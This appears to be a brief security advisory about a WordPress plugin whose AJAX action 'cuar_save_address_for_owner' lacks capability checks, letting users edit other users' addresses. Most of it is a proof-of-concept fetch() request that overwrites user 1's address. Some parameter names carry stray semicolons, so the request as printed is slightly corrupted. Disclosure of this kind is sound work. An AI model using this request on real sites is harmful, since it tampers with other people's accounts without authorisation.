Description The plugin does not properly validate users capabilities in some of its AJAX actions, allowing malicious users to edit other users’ account address.
You may get the nonce from your save address form fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded; charset=UTF-8”, }, “body”: ‘action=cuar_save_address_for_owner&cuar;_nonce=a73a7eab3b&owner;[type]=usr&owner;[ids][]=1&address;_id=home_address&address;[name]=hohohohoh’, “method”: “POST”, “mode”: “cors”, “credentials”: “include” }) .then((response) => { return response.text(); }) .then((data) => { console.log(data); });